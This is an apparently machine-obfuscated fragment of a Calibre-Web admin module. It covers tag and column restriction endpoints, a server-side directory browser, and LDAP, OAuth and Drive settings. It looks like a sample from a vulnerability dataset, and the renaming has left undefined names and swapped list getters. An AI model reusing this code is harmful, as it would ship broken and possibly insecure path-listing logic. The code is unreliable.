if VAR_8 == 0: # Tags as template
VAR_69 = config.list_allowed_tags()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
config.config_allowed_tags = ','.join(VAR_69)
config.save()
if VAR_8 == 1: # CustomC
VAR_69 = config.list_allowed_column_values()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
config.config_allowed_column_value = ','.join(VAR_69)
config.save()
if VAR_8 == 2: # Tags per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
VAR_69 = VAR_120.list_allowed_tags()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
VAR_120.allowed_tags = ','.join(VAR_69)
ub.session_commit("Changed allowed VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.allowed_tags))
if VAR_8 == 3: # CColumn per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
VAR_69 = VAR_120.list_allowed_column_values()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
VAR_120.allowed_column_value = ','.join(VAR_69)
ub.session_commit("Changed allowed columns of VAR_12 {} to {}".format(VAR_120.name, VAR_120.allowed_column_value))
if VAR_10['id'].startswith('d'):
if VAR_8 == 0: # Tags as template
VAR_69 = config.list_denied_tags()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
config.config_denied_tags = ','.join(VAR_69)
config.save()
if VAR_8 == 1: # CustomC
VAR_69 = config.list_denied_column_values()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
config.config_denied_column_value = ','.join(VAR_69)
config.save()
if VAR_8 == 2: # Tags per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
VAR_69 = VAR_120.list_denied_tags()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
VAR_120.denied_tags = ','.join(VAR_69)
ub.session_commit("Changed denied VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.denied_tags))
if VAR_8 == 3: # CColumn per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
VAR_69 = VAR_120.list_denied_column_values()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
VAR_120.denied_column_value = ','.join(VAR_69)
ub.session_commit("Changed denied columns of VAR_12 {} to {}".format(VAR_120.name, VAR_120.denied_column_value))
return ""
def FUNC_27(VAR_10, VAR_11):
VAR_69 = VAR_11()
if VAR_69 == ['']:
VAR_69 = []
if not VAR_10['add_element'] in VAR_69:
elementlist += [VAR_10['add_element']]
return ','.join(VAR_69)
def FUNC_28(VAR_10, VAR_11):
VAR_69 = VAR_11()
if VAR_10['Element'] in VAR_69:
elementlist.remove(VAR_10['Element'])
return ','.join(VAR_69)
def FUNC_29(VAR_12, VAR_13, VAR_14, VAR_15):
if "tags" in VAR_14:
VAR_40 = calibre_db.session.query(db.Tags).filter(db.Tags.id.in_(VAR_15)).all()
if not VAR_40:
raise Exception(_("Tag not found"))
VAR_102 = [VAR_17.name for VAR_17 in VAR_40]
else:
VAR_40 = calibre_db.session.query(db.cc_classes[config.config_restricted_column])\
.filter(db.cc_classes[config.config_restricted_column].id.in_(VAR_15)).all()
VAR_102 = [VAR_17.value for VAR_17 in VAR_40]
VAR_70 = VAR_12.__dict__[VAR_14].split(",") if len(VAR_12.__dict__[VAR_14]) else []
if VAR_13 == "remove":
VAR_70 = [VAR_17 for VAR_17 in VAR_70 if VAR_17 not in VAR_102]
elif VAR_13 == "add":
VAR_70.extend(VAR_17 for VAR_17 in VAR_102 if VAR_17 not in VAR_70)
else:
raise Exception(_("Invalid Action"))
return ",".join(VAR_70)
@VAR_2.route("/ajax/addrestriction/<VAR_119:VAR_8>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_30(VAR_8):
return FUNC_31(VAR_8, 0)
@VAR_2.route("/ajax/addrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_31(VAR_8, VAR_9):
VAR_10 = request.form.to_dict()
if VAR_8 == 0: # Tags as template
if 'submit_allow' in VAR_10:
config.config_allowed_tags = FUNC_27(VAR_10, config.list_allowed_tags)
config.save()
elif 'submit_deny' in VAR_10:
config.config_denied_tags = FUNC_27(VAR_10, config.list_denied_tags)
config.save()
if VAR_8 == 1: # CCustom as template
if 'submit_allow' in VAR_10:
config.config_allowed_column_value = FUNC_27(VAR_10, config.list_denied_column_values)
config.save()
elif 'submit_deny' in VAR_10:
config.config_denied_column_value = FUNC_27(VAR_10, config.list_allowed_column_values)
config.save()
if VAR_8 == 2: # Tags per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
if 'submit_allow' in VAR_10:
VAR_120.allowed_tags = FUNC_27(VAR_10, VAR_120.list_allowed_tags)
ub.session_commit("Changed allowed VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.list_allowed_tags()))
elif 'submit_deny' in VAR_10:
VAR_120.denied_tags = FUNC_27(VAR_10, VAR_120.list_denied_tags)
ub.session_commit("Changed denied VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.list_denied_tags()))
if VAR_8 == 3: # CustomC per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
if 'submit_allow' in VAR_10:
VAR_120.allowed_column_value = FUNC_27(VAR_10, VAR_120.list_allowed_column_values)
ub.session_commit("Changed allowed columns of VAR_12 {} to {}".format(VAR_120.name,
VAR_120.list_allowed_column_values()))
elif 'submit_deny' in VAR_10:
VAR_120.denied_column_value = FUNC_27(VAR_10, VAR_120.list_denied_column_values)
ub.session_commit("Changed denied columns of VAR_12 {} to {}".format(VAR_120.name,
VAR_120.list_denied_column_values()))
return ""
@VAR_2.route("/ajax/deleterestriction/<VAR_119:VAR_8>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_32(VAR_8):
return FUNC_33(VAR_8, 0)
@VAR_2.route("/ajax/deleterestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_33(VAR_8, VAR_9):
VAR_10 = request.form.to_dict()
if VAR_8 == 0: # Tags as template
if VAR_10['id'].startswith('a'):
config.config_allowed_tags = FUNC_28(VAR_10, config.list_allowed_tags)
config.save()
elif VAR_10['id'].startswith('d'):
config.config_denied_tags = FUNC_28(VAR_10, config.list_denied_tags)
config.save()
elif VAR_8 == 1: # CustomC as template
if VAR_10['id'].startswith('a'):
config.config_allowed_column_value = FUNC_28(VAR_10, config.list_allowed_column_values)
config.save()
elif VAR_10['id'].startswith('d'):
config.config_denied_column_value = FUNC_28(VAR_10, config.list_denied_column_values)
config.save()
elif VAR_8 == 2: # Tags per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
if VAR_10['id'].startswith('a'):
VAR_120.allowed_tags = FUNC_28(VAR_10, VAR_120.list_allowed_tags)
ub.session_commit("Deleted allowed VAR_40 of VAR_12 {}: {}".format(VAR_120.name, VAR_120.list_allowed_tags))
elif VAR_10['id'].startswith('d'):
VAR_120.denied_tags = FUNC_28(VAR_10, VAR_120.list_denied_tags)
ub.session_commit("Deleted denied VAR_40 of VAR_12 {}: {}".format(VAR_120.name, VAR_120.list_allowed_tags))
elif VAR_8 == 3: # Columns per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
if VAR_10['id'].startswith('a'):
VAR_120.allowed_column_value = FUNC_28(VAR_10, VAR_120.list_allowed_column_values)
ub.session_commit("Deleted allowed columns of VAR_12 {}: {}".format(VAR_120.name,
VAR_120.list_allowed_column_values))
elif VAR_10['id'].startswith('d'):
VAR_120.denied_column_value = FUNC_28(VAR_10, VAR_120.list_denied_column_values)
ub.session_commit("Deleted denied columns of VAR_12 {}: {}".format(VAR_120.name,
VAR_120.list_denied_column_values))
return ""
@VAR_2.route("/ajax/listrestriction/<VAR_119:VAR_8>", defaults={"user_id": 0})
@VAR_2.route("/ajax/listrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>")
@login_required
@FUNC_0
def FUNC_34(VAR_8, VAR_9):
if VAR_8 == 0: # Tags as template
VAR_103 = [{'Element': VAR_17, 'type':_('Deny'), 'id': 'd'+str(i) }
for i,VAR_17 in enumerate(config.list_denied_tags()) if VAR_17 != '']
VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, VAR_17 in enumerate(config.list_allowed_tags()) if VAR_17 != '']
VAR_67 = VAR_103 + VAR_7
elif VAR_8 == 1: # CustomC as template
VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, VAR_17 in enumerate(config.list_denied_column_values()) if VAR_17 != '']
VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, VAR_17 in enumerate(config.list_allowed_column_values()) if VAR_17 != '']
VAR_67 = VAR_103 + VAR_7
elif VAR_8 == 2: # Tags per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_9).first()
else:
VAR_120 = VAR_62
VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, VAR_17 in enumerate(VAR_120.list_denied_tags()) if VAR_17 != '']
VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, VAR_17 in enumerate(VAR_120.list_allowed_tags()) if VAR_17 != '']
VAR_67 = VAR_103 + VAR_7
elif VAR_8 == 3: # CustomC per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_9).first()
else:
VAR_120 = VAR_62
VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, VAR_17 in enumerate(VAR_120.list_denied_column_values()) if VAR_17 != '']
VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, VAR_17 in enumerate(VAR_120.list_allowed_column_values()) if VAR_17 != '']
VAR_67 = VAR_103 + VAR_7
else:
VAR_67 = ""
VAR_68 = json.dumps(VAR_67)
VAR_52 = make_response(VAR_68)
VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
return VAR_52
@VAR_2.route("/ajax/fullsync")
@login_required
def FUNC_35():
VAR_55 = ub.session.query(ub.KoboSyncedBooks).filter(VAR_62.id == ub.KoboSyncedBooks.user_id).delete()
VAR_71 = _("{} sync entries deleted").format(VAR_55)
ub.session_commit(VAR_71)
return Response(json.dumps([{"type": "success", "message": VAR_71}]), mimetype='application/json')
@VAR_2.route("/ajax/FUNC_37/")
@login_required
@FUNC_0
def FUNC_36():
return FUNC_37()
def FUNC_37():
VAR_72 = "folder"
VAR_73 = request.args.get('folder', False) == "true"
VAR_74 = request.args.get('filter', "")
VAR_75 = os.path.normpath(request.args.get('path', ""))
if os.path.isfile(VAR_75):
VAR_104 = VAR_75
path = os.path.dirname(VAR_75)
else:
VAR_104 = ""
VAR_76 = False
if os.path.isdir(VAR_75):
VAR_77 = os.path.realpath(VAR_75)
VAR_76 = True
else:
VAR_77 = os.getcwd()
VAR_77 = os.path.normpath(os.path.realpath(VAR_77))
VAR_78 = os.path.dirname(VAR_77)
if not VAR_76:
if os.path.realpath(VAR_77) == os.path.realpath("/"):
VAR_77 = os.path.relpath(VAR_77)
else:
VAR_77 = os.path.relpath(VAR_77) + os.path.sep
VAR_78 = os.path.relpath(VAR_78) + os.path.sep
if os.path.realpath(VAR_77) == os.path.realpath("/"):
VAR_78 = ""
try:
VAR_105 = os.listdir(VAR_77)
except Exception:
VAR_105 = []
VAR_79 = []
for VAR_3 in VAR_105:
try:
VAR_121 = {"name": VAR_3, "fullpath": os.path.join(VAR_77, VAR_3)}
VAR_121["sort"] = VAR_121["fullpath"].lower()
except Exception:
continue
if os.path.isfile(os.path.join(VAR_77, VAR_3)):
if VAR_73:
continue
if VAR_74 != "" and VAR_74 != VAR_3:
continue
VAR_121["type"] = "file"
VAR_121["size"] = os.path.getsize(os.path.join(VAR_77, VAR_3))
VAR_122 = 0
while (VAR_121["size"] >> 10) > 0.3:
VAR_122 += 1
VAR_121["size"] >>= 10
VAR_123 = ("", "K", "M", "G", "T")
VAR_121["size"] = str(VAR_121["size"]) + " " + VAR_123[VAR_122] + "Byte"
else:
VAR_121["type"] = "dir"
VAR_121["size"] = ""
VAR_79.append(VAR_121)
VAR_79 = sorted(VAR_79, key=operator.itemgetter("type", "sort"))
VAR_80 = {
"cwd": VAR_77,
"files": VAR_79,
"parentdir": VAR_78,
"type": VAR_72,
"oldfile": VAR_104,
"absolute": VAR_76,
}
return json.dumps(VAR_80)
def FUNC_38(VAR_16, VAR_17, VAR_18=VAR_119):
return config.set_from_dictionary(VAR_16, VAR_17, VAR_18)
def FUNC_39(VAR_16, VAR_17):
return config.set_from_dictionary(VAR_16, VAR_17, lambda y: y == "on", False)
def FUNC_40(VAR_16, VAR_17):
return config.set_from_dictionary(VAR_16, VAR_17, lambda y: 1 if (y == "on") else 0, 0)
def FUNC_41(VAR_16, VAR_17):
return config.set_from_dictionary(VAR_16, VAR_17, lambda y: y.strip() if y else y)
def FUNC_42(VAR_16):
VAR_21 = None
if VAR_16.get("config_use_google_drive"):
VAR_106 = {}
if not os.path.isfile(gdriveutils.SETTINGS_YAML):
config.config_use_google_drive = False
if gdrive_support:
VAR_21 = gdriveutils.get_error_text(VAR_106)
if "config_use_google_drive" in VAR_16 and not config.config_use_google_drive and not VAR_21:
with open(gdriveutils.CLIENT_SECRETS, 'r') as settings:
VAR_106 = json.load(settings)['web']
if not VAR_106:
return FUNC_50(_('client_secrets.json Is Not Configured For Web Application'))
gdriveutils.update_settings(
VAR_106['client_id'],
VAR_106['client_secret'],
VAR_106['redirect_uris'][0]
)
VAR_81 = (not VAR_21) and ("config_use_google_drive" in VAR_16)
if config.config_use_google_drive and not VAR_81:
config.config_google_drive_watch_changes_response = {}
config.config_use_google_drive = VAR_81
if FUNC_41(VAR_16, "config_google_drive_folder"):
gdriveutils.deleteDatabaseOnChange()
return VAR_21
def FUNC_43(VAR_16):
VAR_82 = 0
VAR_83 = False
for VAR_10 in VAR_96:
if VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"] != VAR_10['oauth_client_id'] \
or VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"] != VAR_10['oauth_client_secret']:
VAR_83 = True
VAR_10['oauth_client_id'] = VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"]
VAR_10['oauth_client_secret'] = VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"]
if VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"] \
and VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"]:
VAR_82 += 1
VAR_10["active"] = 1
else:
VAR_10["active"] = 0
ub.session.query(ub.OAuthProvider).filter(ub.OAuthProvider.id == VAR_10['id']).update(
{"oauth_client_id": VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"],
"oauth_client_secret": VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"],
"active": VAR_10["active"]})
return VAR_83
def FUNC_44(VAR_16):
VAR_83 = False
VAR_83 |= FUNC_38(VAR_16, "config_log_level")
VAR_83 |= FUNC_41(VAR_16, "config_logfile")
if not logger.is_valid_logfile(config.config_logfile):
return VAR_83, \
FUNC_50(_('Logfile Location is not Valid, Please Enter Correct Path'))
VAR_83 |= FUNC_40(VAR_16, "config_access_log")
VAR_83 |= FUNC_41(VAR_16, "config_access_logfile")
if not logger.is_valid_logfile(config.config_access_logfile):
return VAR_83, \
FUNC_50(_('Access Logfile Location is not Valid, Please Enter Correct Path'))
return VAR_83, None
def FUNC_45(VAR_16):
VAR_83 = False
VAR_83 |= FUNC_41(VAR_16, "config_ldap_provider_url")
VAR_83 |= FUNC_38(VAR_16, "config_ldap_port")
VAR_83 |= FUNC_38(VAR_16, "config_ldap_authentication")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_dn")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_serv_username")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_user_object")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_group_object_filter")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_group_members_field")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_member_user_object")
VAR_83 |= FUNC_39(VAR_16, "config_ldap_openldap")
VAR_83 |= FUNC_38(VAR_16, "config_ldap_encryption")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_cacert_path")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_cert_path")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_key_path")
FUNC_41(VAR_16, "config_ldap_group_name")
if VAR_16.get("config_ldap_serv_password", "") != "":
VAR_83 |= 1
config.set_from_dictionary(VAR_16, "config_ldap_serv_password", base64.b64encode, encode='UTF-8')
config.save()
if not config.config_ldap_provider_url \
or not config.config_ldap_port \
or not config.config_ldap_dn \
or not config.config_ldap_user_object:
return VAR_83, FUNC_50(_('Please Enter a LDAP Provider, '
'Port, DN and User Object Identifier'))
if config.config_ldap_authentication > constants.LDAP_AUTH_ANONYMOUS:
if config.config_ldap_authentication > constants.LDAP_AUTH_UNAUTHENTICATE:
if not config.config_ldap_serv_username or not bool(config.config_ldap_serv_password):
return VAR_83, FUNC_50(_('Please Enter a LDAP Service Account and Password'))
else:
if not config.config_ldap_serv_username:
return VAR_83, FUNC_50(_('Please Enter a LDAP Service Account'))
if config.config_ldap_group_object_filter:
if config.config_ldap_group_object_filter.count("%s") != 1:
return VAR_83, \
FUNC_50(_('LDAP Group Object Filter Needs to Have One "%s" Format Identifier'))
if config.config_ldap_group_object_filter.count("(") != config.config_ldap_group_object_filter.count(")"):
return VAR_83, FUNC_50(_('LDAP Group Object Filter Has Unmatched Parenthesis'))
if config.config_ldap_user_object.count("%s") != 1:
return VAR_83, \
FUNC_50(_('LDAP User Object Filter needs to Have One "%s" Format Identifier'))
if config.config_ldap_user_object.count("(") != config.config_ldap_user_object.count(")"):
return VAR_83, FUNC_50(_('LDAP User Object Filter Has Unmatched Parenthesis'))
if VAR_16.get("ldap_import_user_filter") == '0':
config.config_ldap_member_user_object = ""
else:
if config.config_ldap_member_user_object.count("%s") != 1:
return VAR_83, \
FUNC_50(_('LDAP Member User Filter needs to Have One "%s" Format Identifier'))
if config.config_ldap_member_user_object.count("(") != config.config_ldap_member_user_object.count(")"):
return VAR_83, FUNC_50(_('LDAP Member User Filter Has Unmatched Parenthesis'))
if config.config_ldap_cacert_path or config.config_ldap_cert_path or config.config_ldap_key_path:
if not (os.path.isfile(config.config_ldap_cacert_path) and
os.path.isfile(config.config_ldap_cert_path) and
os.path.isfile(config.config_ldap_key_path)):
return VAR_83, \
FUNC_50(_('LDAP CACertificate, Certificate or Key Location is not Valid, '
'Please Enter Correct Path'))
return VAR_83, None
@VAR_2.route("/ajax/simulatedbchange", methods=['POST'])
@login_required
@FUNC_0
def FUNC_46():
VAR_84, VAR_85 = FUNC_47()
return Response(json.dumps({"change": VAR_84, "valid": VAR_85}), mimetype='application/json')
def FUNC_47():
VAR_4 = request.form.to_dict()
VAR_16 = {}
VAR_16['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
'',
VAR_4['config_calibre_dir'],
flags=re.IGNORECASE).strip()
VAR_84 = config.config_calibre_dir != VAR_16["config_calibre_dir"] and config.config_calibre_dir
VAR_85 = calibre_db.check_valid_db(VAR_16["config_calibre_dir"], ub.app_DB_path)
return VAR_84, VAR_85
def FUNC_48():
VAR_84 = False
VAR_16 = request.form.to_dict()
VAR_21 = None
VAR_16['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
'',
VAR_16['config_calibre_dir'],
flags=re.IGNORECASE)
try:
VAR_84, VAR_85 = FUNC_47()
VAR_21 = FUNC_42(VAR_16)
except (OperationalError, InvalidRequestError):
ub.session.rollback()
VAR_0.error("Settings DB is not Writeable")
FUNC_51(_("Settings DB is not Writeable"), VAR_21)
try:
VAR_107 = os.path.join(VAR_16['config_calibre_dir'], "metadata.db")
if config.config_use_google_drive and is_gdrive_ready() and not os.path.exists(VAR_107):
gdriveutils.downloadFile(None, "metadata.db", VAR_107)
VAR_84 = True
except Exception as ex:
return FUNC_51('{}'.format(ex), VAR_21)
if VAR_84 or not VAR_85 or not config.db_configured:
if not calibre_db.setup_db(VAR_16['config_calibre_dir'], ub.app_DB_path):
return FUNC_51(_('DB Location is not Valid, Please Enter Correct Path'),
VAR_21)
ub.session.query(ub.Downloads).delete()
ub.session.query(ub.ArchivedBook).delete()
ub.session.query(ub.ReadBook).delete()
ub.session.query(ub.BookShelf).delete()
ub.session.query(ub.Bookmark).delete()
ub.session.query(ub.KoboReadingState).delete()
ub.session.query(ub.KoboStatistics).delete()
ub.session.query(ub.KoboSyncedBooks).delete()
ub.session_commit()
FUNC_41(VAR_16, "config_calibre_dir")
calibre_db.update_config(config)
if not os.access(os.path.join(config.config_calibre_dir, "metadata.db"), os.W_OK):
flash(_(u"DB is not Writeable"), category="warning")
config.save()
return FUNC_51(None, VAR_21)
def FUNC_49():
VAR_83 = False
VAR_16 = request.form.to_dict()
try:
VAR_83 |= FUNC_38(VAR_16, "config_port")
VAR_83 |= FUNC_41(VAR_16, "config_trustedhosts")
VAR_83 |= FUNC_41(VAR_16, "config_keyfile")
if config.config_keyfile and not os.path.isfile(config.config_keyfile):
return FUNC_50(_('Keyfile Location is not Valid, Please Enter Correct Path'))
VAR_83 |= FUNC_41(VAR_16, "config_certfile")
if config.config_certfile and not os.path.isfile(config.config_certfile):
return FUNC_50(_('Certfile Location is not Valid, Please Enter Correct Path'))
FUNC_40(VAR_16, "config_uploading")
FUNC_40(VAR_16, "config_unicode_filename")
VAR_83 |= (FUNC_40(VAR_16, "config_anonbrowse")
and config.config_login_type == constants.LOGIN_LDAP)
FUNC_40(VAR_16, "config_public_reg")
FUNC_40(VAR_16, "config_register_email")
VAR_83 |= FUNC_40(VAR_16, "config_kobo_sync")
FUNC_38(VAR_16, "config_external_port")
FUNC_40(VAR_16, "config_kobo_proxy")
if "config_upload_formats" in VAR_16:
VAR_16["config_upload_formats"] = ','.join(
helper.uniq([VAR_17.lstrip().rstrip().lower() for VAR_17 in VAR_16["config_upload_formats"].split(',')]))
FUNC_41(VAR_16, "config_upload_formats")
constants.EXTENSIONS_UPLOAD = config.config_upload_formats.split(',')
FUNC_41(VAR_16, "config_calibre")
FUNC_41(VAR_16, "config_converterpath")
FUNC_41(VAR_16, "config_kepubifypath")
VAR_83 |= FUNC_38(VAR_16, "config_login_type")
if config.config_login_type == constants.LOGIN_LDAP:
VAR_20, VAR_71 = FUNC_45(VAR_16)
if VAR_71:
return VAR_71
VAR_83 |= VAR_20
FUNC_39(VAR_16, "config_remote_login")
if not config.config_remote_login:
ub.session.query(ub.RemoteAuthToken).filter(ub.RemoteAuthToken.token_type == 0).delete()
FUNC_39(VAR_16, "config_use_goodreads")
FUNC_41(VAR_16, "config_goodreads_api_key")
FUNC_41(VAR_16, "config_goodreads_api_secret")
if services.goodreads_support:
services.goodreads_support.connect(config.config_goodreads_api_key,
config.config_goodreads_api_secret,
config.config_use_goodreads)
FUNC_38(VAR_16, "config_updatechannel")
FUNC_39(VAR_16, "config_allow_reverse_proxy_header_login")
FUNC_41(VAR_16, "config_reverse_proxy_login_header_name")
if config.config_login_type == constants.LOGIN_OAUTH:
VAR_83 |= FUNC_43(VAR_16)
VAR_20, VAR_71 = FUNC_44(VAR_16)
if VAR_71:
return VAR_71
VAR_83 |= VAR_20
FUNC_41(VAR_16, "config_rarfile_location")
if "config_rarfile_location" in VAR_16:
VAR_124 = helper.check_unrar(config.config_rarfile_location)
if VAR_124:
return FUNC_50(VAR_124)
except (OperationalError, InvalidRequestError):
ub.session.rollback()
VAR_0.error("Settings DB is not Writeable")
FUNC_50(_("Settings DB is not Writeable"))
config.save()
if VAR_83:
web_server.stop(True)
return FUNC_50(None, VAR_83)
def FUNC_50(VAR_19=None, VAR_20=False):
VAR_86 = {}
if VAR_19:
VAR_0.error(VAR_19)
config.load()
VAR_86['result'] = [{'type': "danger", 'message': VAR_19}]
else:
VAR_86['result'] = [{'type': "success", 'message':_(u"Calibre-Web FUNC_6 updated")}]
VAR_86['reboot'] = VAR_20
VAR_86['config_upload']= config.config_upload_formats
return Response(json.dumps(VAR_86), mimetype='application/json')
def FUNC_51(VAR_19=None, VAR_21=None):
VAR_87 = not is_gdrive_ready()
VAR_88 = []
if not VAR_21 and config.config_use_google_drive:
VAR_21 = gdriveutils.get_error_text()
if VAR_21 and gdrive_support:
VAR_0.error(VAR_21)
VAR_21 = _(VAR_21)
flash(VAR_21, category="error")
else:
if not VAR_87 and gdrive_support:
VAR_88 = gdriveutils.listRootFolders()
if VAR_19:
VAR_0.error(VAR_19)
config.load()
flash(VAR_19, category="error")
elif request.method == "POST" and not VAR_21:
flash(_("Database Settings updated"), category="success")
return render_title_template("config_db.html",
config=config,
show_authenticate_google_drive=VAR_87,
gdriveError=VAR_21,
VAR_88=gdrivefolders,
VAR_1=feature_support,
title=_(u"Database Configuration"), page="dbconfig")
def FUNC_52(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25):
VAR_22.default_language = VAR_16["default_language"]
VAR_22.locale = VAR_16.get("locale", VAR_22.locale)
VAR_22.sidebar_view = sum(VAR_119(key[5:]) for key in VAR_16 if key.startswith('show_'))
if "show_detail_random" in VAR_16:
VAR_22.sidebar_view |= constants.DETAIL_RANDOM
VAR_22.role = constants.selected_roles(VAR_16)
VAR_22.password = generate_password_hash(VAR_16["password"])
try:
if not VAR_16["name"] or not VAR_16["email"] or not VAR_16["password"]:
VAR_0.info("Missing entries on new user")
raise Exception(_(u"Please fill out all fields!"))
VAR_22.email = check_email(VAR_16["email"])
VAR_22.name = check_username(VAR_16["name"])
if VAR_16.get("kindle_mail"):
VAR_22.kindle_mail = valid_email(VAR_16["kindle_mail"])
if config.config_public_reg and not check_valid_domain(VAR_22.email):
VAR_0.info("E-mail: {} for new VAR_12 is not from valid domain".format(VAR_22.email))
raise Exception(_(u"E-mail is not from valid domain"))
except Exception as ex:
flash(str(ex), category="error")
return render_title_template("user_edit.html", FUNC_55=1, VAR_22=content,
config=config,
VAR_24=translations,
VAR_23=languages, title=_(u"Add new user"), page="newuser",
VAR_25=kobo_support, registered_oauth=VAR_97)
try:
VAR_22.allowed_tags = config.config_allowed_tags
VAR_22.denied_tags = config.config_denied_tags
VAR_22.allowed_column_value = config.config_allowed_column_value
VAR_22.denied_column_value = config.config_denied_column_value
VAR_22.kobo_only_shelves_sync = VAR_16.get("kobo_only_shelves_sync", 0) == "on"
ub.session.add(VAR_22)
ub.session.commit()
flash(_(u"User '%(VAR_12)s' created", VAR_12=VAR_22.name), category="success")
VAR_0.debug("User {} created".format(VAR_22.name))
return redirect(url_for('admin.admin'))
except IntegrityError:
ub.session.rollback()
VAR_0.error("Found an existing account for {} or {}".format(VAR_22.name, VAR_22.email))
flash(_("Found an existing account for this e-mail address or name."), category="error")
except OperationalError:
ub.session.rollback()
VAR_0.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
def FUNC_53(VAR_22):
if ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != VAR_22.id).count():
if VAR_22.name != "Guest":
ub.session.query(ub.ReadBook).filter(VAR_22.id == ub.ReadBook.user_id).delete()
ub.session.query(ub.Downloads).filter(VAR_22.id == ub.Downloads.user_id).delete()
for us in ub.session.query(ub.Shelf).filter(VAR_22.id == ub.Shelf.user_id):
ub.session.query(ub.BookShelf).filter(us.id == ub.BookShelf.shelf).delete()
ub.session.query(ub.Shelf).filter(VAR_22.id == ub.Shelf.user_id).delete()
ub.session.query(ub.User).filter(ub.User.id == VAR_22.id).delete()
ub.session_commit()
VAR_0.info(u"User {} deleted".format(VAR_22.name))
return(_(u"User '%(nick)s' deleted", nick=VAR_22.name))
else:
VAR_0.warning(_(u"Can't delete Guest User"))
raise Exception(_(u"Can't delete Guest User"))
else:
VAR_0.warning(u"No FUNC_4 VAR_12 remaining, can't delete user")
raise Exception(_(u"No FUNC_4 VAR_12 remaining, can't delete user"))
def FUNC_54(VAR_16, VAR_22, VAR_23, VAR_24, VAR_25):
if VAR_16.get("delete"):
try:
flash(FUNC_53(VAR_22), category="success")
except Exception as ex:
VAR_0.error(ex)
flash(str(ex), category="error")
return redirect(url_for('admin.admin'))
else:
if not ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != VAR_22.id).count() and 'admin_role' not in VAR_16:
VAR_0.warning("No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role from {}".format(VAR_22.name))
flash(_("No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role"), category="error")
